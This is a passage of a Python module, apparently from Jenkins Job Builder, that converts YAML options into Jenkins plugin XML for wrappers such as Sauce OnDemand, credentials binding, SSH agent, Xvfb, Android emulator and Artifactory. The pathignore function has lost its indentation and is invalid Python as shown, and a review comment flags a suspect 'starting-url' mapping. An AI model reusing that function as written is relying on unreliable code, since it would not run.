        ('enable-sauce-connect', 'enableSauceConnect', False),
        ('sauce-host', 'seleniumHost', ''),
        # Fixed: a missing trailing comma here previously fused this tuple
        # with the next one, raising TypeError at runtime.
        ('sauce-port', 'seleniumPort', ''),
        ('launch-sauce-connect-on-slave', 'launchSauceConnectOnSlave', False),
        ('https-protocol', 'httpsProtocol', ''),
        ('sauce-connect-options', 'options', '')]
    convert_mapping_to_xml(sauce, data, mapping, fail_required=True)
    # Optional override global authentication
    username = data.get('override-username')
    key = data.get('override-api-access-key')
    if username and key:
        cred = XML.SubElement(sauce, 'credentials')
        mapping = [
            ('override-username', 'username', None),
            ('override-api-access-key', 'apiKey', None)]
        convert_mapping_to_xml(cred, data, mapping, fail_required=True)
    atype = data.get('type', 'selenium')
    info = XML.SubElement(sauce, 'seleniumInformation')
    if atype == 'selenium':
        # NOTE(review): 'starting-url' is mapped to a 'seleniumBrowsers'
        # tag, which collides with the browsers element created below --
        # looks like it should target a starting-URL tag; confirm against
        # the plugin's config XML before changing.
        selenium_mapping = [('starting-url', 'seleniumBrowsers', ''),
                            ('', 'isWebDriver', False)]
        convert_mapping_to_xml(
            info, data, selenium_mapping, fail_required=True)
        browsers = XML.SubElement(info, 'seleniumBrowsers')
        for platform in data['platforms']:
            mapping = [('', 'string', platform)]
            convert_mapping_to_xml(browsers, data, mapping,
                                   fail_required=True)
        XML.SubElement(sauce, 'seleniumBrowsers',
                       {'reference': '../seleniumInformation/'
                        'seleniumBrowsers'})
    if atype == 'webdriver':
        browsers = XML.SubElement(info, 'webDriverBrowsers')
        for platform in data['platforms']:
            mapping = [('', 'string', platform)]
            convert_mapping_to_xml(browsers, data, mapping,
                                   fail_required=True)
        webdriver_mapping = [('', 'isWebDriver', True)]
        convert_mapping_to_xml(
            info, data, webdriver_mapping, fail_required=True)
        XML.SubElement(sauce, 'webDriverBrowsers',
                       {'reference': '../seleniumInformation/'
                        'webDriverBrowsers'})
def sonar(registry, xml_parent, data):
    """yaml: sonar
    Wrapper for SonarQube Plugin
    Requires :jenkins-wiki:`SonarQube plugin <SonarQube+plugin>`

    :arg str install-name: Release goals and options (default '')

    Minimal Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/sonar-minimal.yaml
       :language: yaml

    Full Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/sonar-full.yaml
       :language: yaml
    """
    wrapper = XML.SubElement(
        xml_parent, 'hudson.plugins.sonar.SonarBuildWrapper')
    wrapper.set('plugin', 'sonar')
    # Only emit the installation name when one was actually provided.
    if data.get('install-name'):
        convert_mapping_to_xml(
            wrapper, data, [('install-name', 'installationName', '')],
            fail_required=True)
def pathignore(registry, xml_parent, data):
"""yaml: pathignore
This plugin allows SCM-triggered jobs to ignore
build requests if only certain paths have changed.
Requires the Jenkins :jenkins-wiki:`Pathignore Plugin <Pathignore+Plugin>`.
:arg str ignored: A set of patterns to define ignored changes
Example::
wrappers:
- pathignore:
ignored: "docs, tests"
"""
ruby = XML.SubElement(xml_parent, 'ruby-proxy-object')
robj = XML.SubElement(ruby, 'ruby-object', attrib={
'pluginid': 'pathignore',
'ruby-class': 'Jenkins::Plugin::Proxies::BuildWrapper'
})
pluginid = XML.SubElement(robj, 'pluginid', {
'pluginid': 'pathignore', 'ruby-class': 'String'
})
pluginid.text = 'pathignore'
obj = XML.SubElement(robj, 'object', {
'ruby-class': 'PathignoreWrapper', 'pluginid': 'pathignore'
})
ignored = XML.SubElement(obj, 'ignored__paths', {
'pluginid': 'pathignore', 'ruby-class': 'String'
})
ignored.text = data.get('ignored', '')
XML.SubElement(obj, 'invert__ignore', {
'ruby-class': 'FalseClass', 'pluginid': 'pathignore'
})
def pre_scm_buildstep(registry, xml_parent, data):
    """yaml: pre-scm-buildstep
    Execute a Build Step before running the SCM
    Requires the Jenkins :jenkins-wiki:`pre-scm-buildstep
    <pre-scm-buildstep>`.

    :arg string failOnError: Specifies if the job should fail on error
        (plugin >= 0.3) (default false).
    :arg list buildsteps: List of build steps to execute

        :Buildstep: Any acceptable builder, as seen in the example

    Example:

    .. literalinclude::
       /../../tests/wrappers/fixtures/pre-scm-buildstep001.yaml
       :language: yaml
    """
    # Get plugin information to maintain backwards compatibility
    info = registry.get_plugin_info('preSCMbuildstep')
    version = pkg_resources.parse_version(info.get('version', "0"))
    bsp = XML.SubElement(
        xml_parent,
        'org.jenkinsci.plugins.preSCMbuildstep.PreSCMBuildStepsWrapper')
    steps_node = XML.SubElement(bsp, 'buildSteps')
    # Older job definitions passed a bare list of steps; newer ones use a
    # dict with a 'buildsteps' key.
    step_list = data if type(data) is list else data.get('buildsteps')
    for step in step_list:
        for built in create_builders(registry, step):
            steps_node.append(built)
    # 'failOnError' only exists in plugin 0.3 and later.
    if version >= pkg_resources.parse_version("0.3"):
        convert_mapping_to_xml(
            bsp, data, [('failOnError', 'failOnError', False)],
            fail_required=True)
def logstash(registry, xml_parent, data):
    """yaml: logstash build wrapper
    Dump the Jenkins console output to Logstash
    Requires the Jenkins :jenkins-wiki:`logstash plugin <Logstash+Plugin>`.

    :arg use-redis: Boolean to use Redis. (default true)
    :arg redis: Redis config params

        :Parameter: * **host** (`str`) Redis hostname (default 'localhost')
        :Parameter: * **port** (`int`) Redis port number (default 6379)
        :Parameter: * **database-number** (`int`)
            Redis database number (default 0)
        :Parameter: * **database-password** (`str`)
            Redis database password (default '')
        :Parameter: * **data-type** (`str`)
            Redis database type (default 'list')
        :Parameter: * **key** (`str`) Redis key (default 'logstash')

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/logstash001.yaml
    """
    wrapper = XML.SubElement(
        xml_parent, 'jenkins.plugins.logstash.LogstashBuildWrapper')
    wrapper.set('plugin', 'logstash@0.8.0')
    convert_mapping_to_xml(
        wrapper, data, [('use-redis', 'useRedis', True)],
        fail_required=True)
    if data.get('use-redis'):
        redis_node = XML.SubElement(wrapper, 'redis')
        redis_mapping = [
            ('host', 'host', 'localhost'),
            ('port', 'port', '6379'),
            ('database-number', 'numb', '0'),
            ('database-password', 'pass', ''),
            ('data-type', 'dataType', 'list'),
            ('key', 'key', 'logstash'),
        ]
        convert_mapping_to_xml(
            redis_node, data.get('redis', {}), redis_mapping,
            fail_required=True)
def mongo_db(registry, xml_parent, data):
    """yaml: mongo-db build wrapper
    Initalizes a MongoDB database while running the build.
    Requires the Jenkins :jenkins-wiki:`MongoDB plugin <MongoDB+Plugin>`.

    :arg str name: The name of the MongoDB install to use (required)
    :arg str data-directory: Data directory for the server (default '')
    :arg int port: Port for the server (default '')
    :arg str startup-params: Startup parameters for the server (default '')
    :arg int start-timeout: How long to wait for the server to start in
        milliseconds. 0 means no timeout. (default 0)

    Full Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/mongo-db-full.yaml

    Minimal Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/mongo-db-minimal.yaml
    """
    wrapper = XML.SubElement(
        xml_parent, 'org.jenkinsci.plugins.mongodb.MongoBuildWrapper')
    wrapper.set('plugin', 'mongodb')
    convert_mapping_to_xml(wrapper, data, [
        ('name', 'mongodbName', None),
        ('port', 'port', ''),
        ('data-directory', 'dbpath', ''),
        ('startup-params', 'parameters', ''),
        ('start-timeout', 'startTimeout', 0),
    ], fail_required=True)
def delivery_pipeline(registry, xml_parent, data):
    """yaml: delivery-pipeline
    If enabled the job will create a version based on the template.
    The version will be set to the environment variable PIPELINE_VERSION
    and will also be set in the downstream jobs.

    Requires the Jenkins :jenkins-wiki:`Delivery Pipeline Plugin
    <Delivery+Pipeline+Plugin>`.

    :arg str version-template: Template for generated version e.g
        1.0.${BUILD_NUMBER} (default '')
    :arg bool set-display-name: Set the generated version as the display
        name for the build (default false)

    Minimal Example:

    .. literalinclude::
       /../../tests/wrappers/fixtures/delivery-pipeline-minimal.yaml
       :language: yaml

    Full Example:

    .. literalinclude::
       /../../tests/wrappers/fixtures/delivery-pipeline-full.yaml
       :language: yaml
    """
    contributor = XML.SubElement(
        xml_parent,
        'se.diabol.jenkins.pipeline.PipelineVersionContributor')
    contributor.set('plugin', 'delivery-pipeline-plugin')
    convert_mapping_to_xml(contributor, data, [
        ('version-template', 'versionTemplate', ''),
        ('set-display-name', 'updateDisplayName', False),
    ], fail_required=True)
def matrix_tie_parent(registry, xml_parent, data):
    """yaml: matrix-tie-parent
    Tie parent to a node.
    Requires the Jenkins :jenkins-wiki:`Matrix Tie Parent Plugin
    <Matrix+Tie+Parent+Plugin>`.
    Note that from Jenkins version 1.532 this plugin's functionality is
    available under the "advanced" option of the matrix project
    configuration. You can use the top level ``node`` parameter to control
    where the parent job is tied in Jenkins 1.532 and higher.

    :arg str node: Name of the node (required)

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/matrix-tie-parent.yaml
    """
    node = XML.SubElement(xml_parent, 'matrixtieparent.BuildWrapperMtp')
    convert_mapping_to_xml(
        node, data, [('node', 'labelName', None)], fail_required=True)
def exclusion(registry, xml_parent, data):
    """yaml: exclusion
    Add a resource to use for critical sections to establish a mutex on. If
    another job specifies the same resource, the second job will wait for
    the blocked resource to become available.

    Requires the Jenkins :jenkins-wiki:`Exclusion Plugin <Exclusion-Plugin>`.

    :arg list resources: List of resources to add for exclusion

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/exclusion002.yaml
    """
    allocator = XML.SubElement(
        xml_parent, 'org.jvnet.hudson.plugins.exclusion.IdAllocator')
    allocator.set('plugin', 'Exclusion')
    ids = XML.SubElement(allocator, 'ids')
    # Resource names are upper-cased to match the plugin's convention.
    for resource in data.get('resources', []):
        id_type = XML.SubElement(
            ids, 'org.jvnet.hudson.plugins.exclusion.DefaultIdType')
        convert_mapping_to_xml(
            id_type, data, [('', 'name', resource.upper())],
            fail_required=True)
def ssh_agent_credentials(registry, xml_parent, data):
    """yaml: ssh-agent-credentials
    Sets up the user for the ssh agent plugin for jenkins.

    Requires the Jenkins :jenkins-wiki:`SSH-Agent Plugin
    <SSH+Agent+Plugin>`.

    :arg list users: A list of Jenkins users credential IDs (required)
    :arg str user: The user id of the jenkins user credentials (deprecated)

    Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/ssh-agent-credentials002.yaml

    if both **users** and **user** parameters specified, **users** will be
    prefered, **user** will be ignored.

    Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/ssh-agent-credentials003.yaml

    The **users** with one value in list equals to the **user**. In this
    case old style XML will be generated. Use this format if you use
    SSH-Agent plugin < 1.5.

    Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/ssh-agent-credentials004.yaml

    equals to:

    .. literalinclude::
        /../../tests/wrappers/fixtures/ssh-agent-credentials001.yaml
    """
    logger = logging.getLogger(__name__)
    entry_xml = XML.SubElement(
        xml_parent,
        'com.cloudbees.jenkins.plugins.sshagent.SSHAgentBuildWrapper')
    xml_key = 'user'
    user_list = []
    if 'users' in data:
        user_list.extend(data['users'])
        if len(user_list) > 1:
            # More than one credential needs the new-style nested layout.
            entry_xml = XML.SubElement(entry_xml, 'credentialIds')
            xml_key = 'string'
        if 'user' in data:
            logger.warning(
                "Both 'users' and 'user' parameters specified for "
                "ssh-agent-credentials. 'users' is used, 'user' is "
                "ignored.")
    elif 'user' in data:
        logger.warning("The 'user' param has been deprecated, "
                       "use the 'users' param instead.")
        user_list.append(data['user'])
    else:
        raise JenkinsJobsException("Missing 'user' or 'users' parameter "
                                   "for ssh-agent-credentials")
    for credential in user_list:
        XML.SubElement(entry_xml, xml_key).text = credential
def credentials_binding(registry, xml_parent, data):
    """yaml: credentials-binding
    Binds credentials to environment variables using the credentials
    binding plugin for jenkins.

    Requires the Jenkins :jenkins-wiki:`Credentials Binding Plugin
    <Credentials+Binding+Plugin>` version 1.1 or greater.

    :arg list binding-type: List of each bindings to create. Bindings may
        be of type `zip-file`, `file`, `username-password`, `text`,
        `username-password-separated` or `amazon-web-services`.
        username-password sets a variable to the username and password
        given in the credentials, separated by a colon.
        username-password-separated sets one variable to the username and
        one variable to the password given in the credentials.
        amazon-web-services sets one variable to the access key and one
        variable to the secret access key. Requires the
        :jenkins-wiki:`AWS Credentials Plugin
        <CloudBees+AWS+Credentials+Plugin>`.

        :Parameters: * **credential-id** (`str`) UUID of the credential
                       being referenced
                     * **variable** (`str`) Environment variable where the
                       credential will be stored
                     * **username** (`str`) Environment variable for the
                       username (Required for binding-type
                       username-password-separated)
                     * **password** (`str`) Environment variable for the
                       password (Required for binding-type
                       username-password-separated)
                     * **access-key** (`str`) Environment variable for the
                       access key (Required for binding-type
                       amazon-web-services)
                     * **secret-key** (`str`) Environment variable for the
                       access secret key (Required for binding-type
                       amazon-web-services)

    Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/credentials_binding.yaml
        :language: yaml
    """
    wrapper_tag = (
        'org.jenkinsci.plugins.credentialsbinding.impl.SecretBuildWrapper')
    # Reuse an existing wrapper/bindings element so repeated invocations
    # accumulate bindings instead of creating duplicates.
    entry_xml = xml_parent.find(wrapper_tag)
    if entry_xml is None:
        entry_xml = XML.SubElement(xml_parent, wrapper_tag)
    bindings_xml = entry_xml.find('bindings')
    if bindings_xml is None:
        bindings_xml = XML.SubElement(entry_xml, 'bindings')
    impl = 'org.jenkinsci.plugins.credentialsbinding.impl.'
    binding_types = {
        'zip-file': impl + 'ZipFileBinding',
        'file': impl + 'FileBinding',
        'username-password': impl + 'UsernamePasswordBinding',
        'username-password-separated': impl + 'UsernamePasswordMultiBinding',
        'text': impl + 'StringBinding',
        'amazon-web-services':
            'com.cloudbees.jenkins.plugins.awscredentials'
            '.AmazonWebServicesCredentialsBinding',
    }
    for binding in data:
        for binding_type, params in binding.items():
            if binding_type not in binding_types.keys():
                raise JenkinsJobsException('binding-type must be one of %r' %
                                           binding_types.keys())
            binding_xml = XML.SubElement(
                bindings_xml, binding_types[binding_type])
            if binding_type == 'username-password-separated':
                var_mapping = [
                    ('username', 'usernameVariable', None),
                    ('password', 'passwordVariable', None)]
                convert_mapping_to_xml(
                    binding_xml, params, var_mapping, fail_required=True)
            elif binding_type == 'amazon-web-services':
                var_mapping = [
                    ('access-key', 'accessKeyVariable', None),
                    ('secret-key', 'secretKeyVariable', None)]
                convert_mapping_to_xml(
                    binding_xml, params, var_mapping, fail_required=True)
            else:
                convert_mapping_to_xml(
                    binding_xml, params, [('variable', 'variable', None)],
                    fail_required=False)
            convert_mapping_to_xml(
                binding_xml, params,
                [('credential-id', 'credentialsId', None)],
                fail_required=False)
def custom_tools(registry, xml_parent, data):
    """yaml: custom-tools
    Requires the Jenkins :jenkins-wiki:`Custom Tools Plugin
    <Custom+Tools+Plugin>`.

    :arg list tools: List of custom tools to add (optional)
    :arg bool skip-master-install: skips the install in top level matrix
        job (default 'false')
    :arg bool convert-homes-to-upper: Converts the home env vars to
        uppercase (default 'false')

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/custom-tools001.yaml
    """
    base = 'com.cloudbees.jenkins.plugins.customtools'
    wrapper = XML.SubElement(xml_parent, base + ".CustomToolInstallWrapper")
    selected = XML.SubElement(wrapper, 'selectedTools')
    tool_tag = base + '.CustomToolInstallWrapper_-SelectedTool'
    for tool in data.get('tools', []):
        tool_node = XML.SubElement(selected, tool_tag)
        convert_mapping_to_xml(
            tool_node, data, [('', 'name', tool)], fail_required=True)
    opts = XML.SubElement(wrapper, 'multiconfigOptions')
    convert_mapping_to_xml(
        opts, data,
        [('skip-master-install', 'skipMasterInstallation', False)],
        fail_required=True)
    convert_mapping_to_xml(
        wrapper, data,
        [('convert-homes-to-upper', 'convertHomesToUppercase', False)],
        fail_required=True)
def nodejs_installator(registry, xml_parent, data):
    """yaml: nodejs-installator
    Requires the Jenkins :jenkins-wiki:`NodeJS Plugin <NodeJS+Plugin>`.

    :arg str name: nodejs installation name (required)

    Example:

    .. literalinclude::
        /../../tests/wrappers/fixtures/nodejs-installator001.yaml
    """
    wrapper = XML.SubElement(
        xml_parent,
        'jenkins.plugins.nodejs.tools.NpmPackagesBuildWrapper')
    convert_mapping_to_xml(
        wrapper, data, [('name', 'nodeJSInstallationName', None)],
        fail_required=True)
def xvnc(registry, xml_parent, data):
    """yaml: xvnc
    Enable xvnc during the build.
    Requires the Jenkins :jenkins-wiki:`xvnc plugin <Xvnc+Plugin>`.

    :arg bool screenshot: Take screenshot upon build completion
        (default false)
    :arg bool xauthority: Create a dedicated Xauthority file per build
        (default true)

    Full Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/xvnc-full.yaml
       :language: yaml

    Minimal Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/xvnc-minimal.yaml
       :language: yaml
    """
    wrapper = XML.SubElement(xml_parent, 'hudson.plugins.xvnc.Xvnc')
    wrapper.set('plugin', 'xvnc')
    convert_mapping_to_xml(wrapper, data, [
        ('screenshot', 'takeScreenshot', False),
        ('xauthority', 'useXauthority', True),
    ], fail_required=True)
def job_log_logger(registry, xml_parent, data):
    """yaml: job-log-logger
    Enable writing the job log to the underlying logging system.
    Requires the Jenkins :jenkins-wiki:`Job Log Logger plugin
    <Job+Log+Logger+Plugin>`.

    :arg bool suppress-empty: Suppress empty log messages (default true)

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/job-log-logger001.yaml
    """
    wrapper = XML.SubElement(
        xml_parent,
        'org.jenkins.ci.plugins.jobloglogger.JobLogLoggerBuildWrapper')
    convert_mapping_to_xml(
        wrapper, data, [('suppress-empty', 'suppressEmpty', True)],
        fail_required=True)
def xvfb(registry, xml_parent, data):
    """yaml: xvfb
    Enable xvfb during the build.
    Requires the Jenkins :jenkins-wiki:`Xvfb Plugin <Xvfb+Plugin>`.

    :arg str installation-name: The name of the Xvfb tool instalation
        (default 'default')
    :arg bool auto-display-name: Uses the -displayfd option of Xvfb by
        which it chooses it's own display name (default false)
    :arg str display-name: Ordinal of the display Xvfb will be running on,
        if left empty choosen based on current build executor number
        (default '')
    :arg str assigned-labels: If you want to start Xvfb only on specific
        nodes specify its name or label (default '')
    :arg bool parallel-build: When running multiple Jenkins nodes on the
        same machine this setting influences the display number generation
        (default false)
    :arg int timeout: A timeout of given seconds to wait before returning
        control to the job (default 0)
    :arg str screen: Resolution and color depth. (default '1024x768x24')
    :arg int display-name-offset: Offset for display names. (default 1)
    :arg str additional-options: Additional options to be added with the
        options above to the Xvfb command line (default '')
    :arg bool debug: If Xvfb output should appear in console log of this
        job (default false)
    :arg bool shutdown-with-build: Should the display be kept until the
        whole job ends (default false)

    Full Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/xvfb-full.yaml
       :language: yaml

    Minimal Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/xvfb-minimal.yaml
       :language: yaml
    """
    wrapper = XML.SubElement(
        xml_parent, 'org.jenkinsci.plugins.xvfb.XvfbBuildWrapper')
    convert_mapping_to_xml(wrapper, data, [
        ('installation-name', 'installationName', 'default'),
        ('auto-display-name', 'autoDisplayName', False),
        ('display-name', 'displayName', ''),
        ('assigned-labels', 'assignedLabels', ''),
        ('parallel-build', 'parallelBuild', False),
        ('timeout', 'timeout', 0),
        ('screen', 'screen', '1024x768x24'),
        ('display-name-offset', 'displayNameOffset', 1),
        ('additional-options', 'additionalOptions', ''),
        ('debug', 'debug', False),
        ('shutdown-with-build', 'shutdownWithBuild', False),
    ], fail_required=True)
def android_emulator(registry, xml_parent, data):
    """yaml: android-emulator
    Automates many Android development tasks including SDK installation,
    build file generation, emulator creation and launch,
    APK (un)installation...
    Requires the Jenkins :jenkins-wiki:`Android Emulator Plugin
    <Android+Emulator+Plugin>`.

    :arg str avd: Enter the name of an existing Android emulator
        configuration. This option is exclusive with the 'os' arg.
    :arg str os: Can be an OS version, target name or SDK add-on
    :arg str screen-density: Density in dots-per-inch (dpi) or as an
        alias, e.g. "160" or "mdpi". (default mdpi)
    :arg str screen-resolution: Can be either a named resolution or
        explicit size, e.g. "WVGA" or "480x800". (default WVGA)
    :arg str locale: Language and country pair. (default en_US)
    :arg str target-abi: Name of the ABI / system image to be used.
        (optional)
    :arg str sd-card: sd-card size e.g. "32M" or "10240K". (optional)
    :arg bool wipe: if true, the emulator will have its user data reset at
        start-up (default false)
    :arg bool show-window: if true, the Android emulator user interface
        will be displayed on screen during the build. (default false)
    :arg bool snapshot: Start emulator from stored state (default false)
    :arg bool delete: Delete Android emulator at the end of build
        (default false)
    :arg int startup-delay: Wait this many seconds before attempting
        to start the emulator (default 0)
    :arg str commandline-options: Will be given when starting the
        Android emulator executable (optional)
    :arg str exe: The emulator executable. (optional)
    :arg list hardware-properties: Dictionary of hardware properties.
        Allows you to override the default values for an AVD. (optional)

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/android003.yaml
    """
    root = XML.SubElement(
        xml_parent, 'hudson.plugins.android__emulator.AndroidEmulator')
    # Exactly one of 'avd' or 'os' must be supplied.
    has_avd = bool(data.get('avd'))
    has_os = bool(data.get('os'))
    if has_avd and has_os:
        raise JenkinsJobsException("'avd' and 'os' options are "
                                   "exclusive, please pick one only")
    if not has_avd and not has_os:
        raise JenkinsJobsException("AndroidEmulator requires an AVD name or"
                                   "OS version to run: specify 'os' or 'avd'")
    if has_avd:
        XML.SubElement(root, 'avdName').text = str(data['avd'])
    else:
        convert_mapping_to_xml(root, data, [
            ('os', 'osVersion', None),
            ('screen-density', 'screenDensity', 'mdpi'),
            ('screen-resolution', 'screenResolution', 'WVGA'),
            ('locale', 'deviceLocale', 'en_US'),
            ('target-abi', 'targetAbi', ''),
            ('sd-card', 'sdCardSize', ''),
        ], fail_required=True)
    hardware = XML.SubElement(root, 'hardwareProperties')
    for prop_name, prop_val in data.get('hardware-properties', {}).items():
        prop_node = XML.SubElement(
            hardware,
            'hudson.plugins.android__emulator'
            '.AndroidEmulator_-HardwareProperty')
        convert_mapping_to_xml(prop_node, data, [
            ('', 'key', prop_name),
            ('', 'value', prop_val),
        ], fail_required=True)
    convert_mapping_to_xml(root, data, [
        ('wipe', 'wipeData', False),
        ('show-window', 'showWindow', False),
        ('snapshot', 'useSnapshots', False),
        ('delete', 'deleteAfterBuild', False),
        ('startup-delay', 'startupDelay', 0),
        ('commandline-options', 'commandLineOptions', ''),
        ('exe', 'executable', ''),
    ], fail_required=True)
def artifactory_maven(registry, xml_parent, data):
    """yaml: artifactory-maven
    Wrapper for non-Maven projects. Requires the
    :jenkins-wiki:`Artifactory Plugin <Artifactory+Plugin>`

    :arg str url: URL of the Artifactory server. e.g.
        https://www.jfrog.com/artifactory/ (default '')
    :arg str name: Artifactory user with permissions use for
        connected to the selected Artifactory Server
        (default '')
    :arg str repo-key: Name of the repository to search for
        artifact dependencies. Provide a single repo-key or provide
        separate release-repo-key and snapshot-repo-key.
    :arg str release-repo-key: Release repository name. Value of
        repo-key take priority over release-repo-key if provided.
    :arg str snapshot-repo-key: Snapshots repository name. Value of
        repo-key take priority over release-repo-key if provided.

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/artifactory001.yaml
       :language: yaml

    """
    # Root element consumed by the Artifactory plugin for native Maven 3
    # resolution.
    root = XML.SubElement(
        xml_parent,
        'org.jfrog.hudson.maven3.ArtifactoryMaven3NativeConfigurator')
    # Server connection details shared by every Artifactory wrapper.
    details = XML.SubElement(root, 'details')
    artifactory_common_details(details, data)
    # A single 'repo-key' takes priority over the split
    # release/snapshot repository pair.
    if 'repo-key' in data:
        download_mapping = [('repo-key', 'downloadRepositoryKey', None)]
    else:
        download_mapping = [
            ('snapshot-repo-key', 'downloadSnapshotRepositoryKey', ''),
            ('release-repo-key', 'downloadReleaseRepositoryKey', '')]
    convert_mapping_to_xml(details, data, download_mapping, fail_required=True)
def artifactory_generic(registry, xml_parent, data):
    """yaml: artifactory-generic
    Wrapper for non-Maven projects. Requires the
    :jenkins-wiki:`Artifactory Plugin <Artifactory+Plugin>`

    :arg str url: URL of the Artifactory server. e.g.
        https://www.jfrog.com/artifactory/ (default '')
    :arg str name: Artifactory user with permissions use for
        connected to the selected Artifactory Server
        (default '')
    :arg str repo-key: Release repository name (plugin < 2.3.0) (default '')
    :arg str snapshot-repo-key: Snapshots repository name (plugin < 2.3.0)
        (default '')
    :arg str key-from-select: Repository key to use (plugin >= 2.3.0)
        (default '')
    :arg str key-from-text: Repository key to use that can be configured
        dynamically using Jenkins variables (plugin >= 2.3.0) (default '')
    :arg list deploy-pattern: List of patterns for mappings
        build artifacts to published artifacts. Supports Ant-style wildcards
        mapping to target directories. E.g.: */*.zip=>dir (default [])
    :arg list resolve-pattern: List of references to other
        artifacts that this build should use as dependencies.
    :arg list matrix-params: List of properties to attach to all deployed
        artifacts in addition to the default ones: build.name, build.number,
        and vcs.revision (default [])
    :arg bool deploy-build-info: Deploy jenkins build metadata with
        artifacts to Artifactory (default false)
    :arg bool env-vars-include: Include environment variables accessible by
        the build process. Jenkins-specific env variables are always included.
        Use the env-vars-include-patterns and env-vars-exclude-patterns to
        filter the environment variables published to artifactory.
        (default false)
    :arg list env-vars-include-patterns: List of environment variable patterns
        for including env vars as part of the published build info. Environment
        variables may contain the * and the ? wildcards (default [])
    :arg list env-vars-exclude-patterns: List of environment variable patterns
        that determine the env vars excluded from the published build info
        (default [])
    :arg bool discard-old-builds:
        Remove older build info from Artifactory (default false)
    :arg bool discard-build-artifacts:
        Remove older build artifacts from Artifactory (default true)

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/artifactory002.yaml
       :language: yaml

    """
    artifactory = XML.SubElement(
        xml_parent,
        'org.jfrog.hudson.generic.ArtifactoryGenericConfigurator')
    # details
    details = XML.SubElement(artifactory, 'details')
    artifactory_common_details(details, data)
    # Get plugin information to maintain backwards compatibility
    info = registry.get_plugin_info('artifactory')
    # Note: Assume latest version of plugin is preferred config format
    version = pkg_resources.parse_version(
        info.get('version', str(sys.maxsize)))
    if version >= pkg_resources.parse_version('2.3.0'):
        # Plugin >= 2.3.0: repository selection moved into a nested
        # deployReleaseRepository element; dynamicMode is 'true' only when
        # the key was supplied as free text (key-from-text).
        deployReleaseRepo = XML.SubElement(details, 'deployReleaseRepository')
        XML.SubElement(deployReleaseRepo, 'keyFromText').text = data.get(
            'key-from-text', '')
        XML.SubElement(deployReleaseRepo, 'keyFromSelect').text = data.get(
            'key-from-select', '')
        XML.SubElement(deployReleaseRepo, 'dynamicMode').text = str(
            'key-from-text' in data.keys()).lower()
    else:
        # Older plugin versions used flat repositoryKey/snapshotsRepositoryKey
        # elements directly under 'details'.
        XML.SubElement(details, 'repositoryKey').text = data.get(
            'repo-key', '')
        XML.SubElement(details, 'snapshotsRepositoryKey').text = data.get(
            'snapshot-repo-key', '')
    # List-valued options are serialized as comma-joined strings; boolean
    # options as the lowercase strings 'true'/'false' that Jenkins expects.
    XML.SubElement(artifactory, 'deployPattern').text = ','.join(data.get(
        'deploy-pattern', []))
    XML.SubElement(artifactory, 'resolvePattern').text = ','.join(
        data.get('resolve-pattern', []))
    XML.SubElement(artifactory, 'matrixParams').text = ','.join(
        data.get('matrix-params', []))
    XML.SubElement(artifactory, 'deployBuildInfo').text = str(
        data.get('deploy-build-info', False)).lower()
    XML.SubElement(artifactory, 'includeEnvVars').text = str(
        data.get('env-vars-include', False)).lower()
    XML.SubElement(artifactory, 'discardOldBuilds').text = str(
        data.get('discard-old-builds', False)).lower()
    # NOTE(review): this default is True, unlike the other booleans above.
    XML.SubElement(artifactory, 'discardBuildArtifacts').text = str(
        data.get('discard-build-artifacts', True)).lower()
    # envVarsPatterns
    artifactory_env_vars_patterns(artifactory, data)
def artifactory_maven_freestyle(registry, xml_parent, data):
    """yaml: artifactory-maven-freestyle
    Wrapper for Free Style projects. Requires the Artifactory plugin.
    Requires :jenkins-wiki:`Artifactory Plugin <Artifactory+Plugin>`

    :arg str url: URL of the Artifactory server. e.g.
        https://www.jfrog.com/artifactory/ (default '')
    :arg str name: Artifactory user with permissions use for
        connected to the selected Artifactory Server (default '')
    :arg str release-repo-key: Release repository name (default '')
    :arg str snapshot-repo-key: Snapshots repository name (default '')
    :arg bool publish-build-info: Push build metadata with artifacts
        (default false)
    :arg bool discard-old-builds:
        Remove older build info from Artifactory (default true)
    :arg bool discard-build-artifacts:
        Remove older build artifacts from Artifactory (default false)
    :arg bool include-env-vars: Include all environment variables
        accessible by the build process. Jenkins-specific env variables
        are always included (default false)
    :arg bool run-checks: Run automatic license scanning check after the
        build is complete (default false)
    :arg bool include-publish-artifacts: Include the build's published
        module artifacts in the license violation checks if they are
        also used as dependencies for other modules in this build
        (default false)
    :arg bool license-auto-discovery: Tells Artifactory not to try
        and automatically analyze and tag the build's dependencies
        with license information upon deployment (default true)
    :arg bool enable-issue-tracker-integration: When the Jenkins
        JIRA plugin is enabled, synchronize information about JIRA
        issues to Artifactory and attach issue information to build
        artifacts (default false)
    :arg bool aggregate-build-issues: When the Jenkins JIRA plugin
        is enabled, include all issues from previous builds up to the
        latest build status defined in "Aggregation Build Status"
        (default false)
    :arg bool filter-excluded-artifacts-from-build: Add the excluded
        files to the excludedArtifacts list and remove them from the
        artifacts list in the build info (default false)
    :arg str scopes: A list of dependency scopes/configurations to run
        license violation checks on. If left empty all dependencies from
        all scopes will be checked (default '')
    :arg str violation-recipients: Recipients that need to be notified
        of license violations in the build info (default '')
    :arg list matrix-params: List of properties to attach to all
        deployed artifacts in addition to the default ones:
        build.name, build.number, and vcs.revision (default '')
    :arg str black-duck-app-name: The existing Black Duck Code Center
        application name (default '')
    :arg str black-duck-app-version: The existing Black Duck Code Center
        application version (default '')
    :arg str black-duck-report-recipients: Recipients that will be emailed
        a report after the automatic Black Duck Code Center compliance checks
        finished (default '')
    :arg str black-duck-scopes: A list of dependency scopes/configurations
        to run Black Duck Code Center compliance checks on. If left empty
        all dependencies from all scopes will be checked (default '')
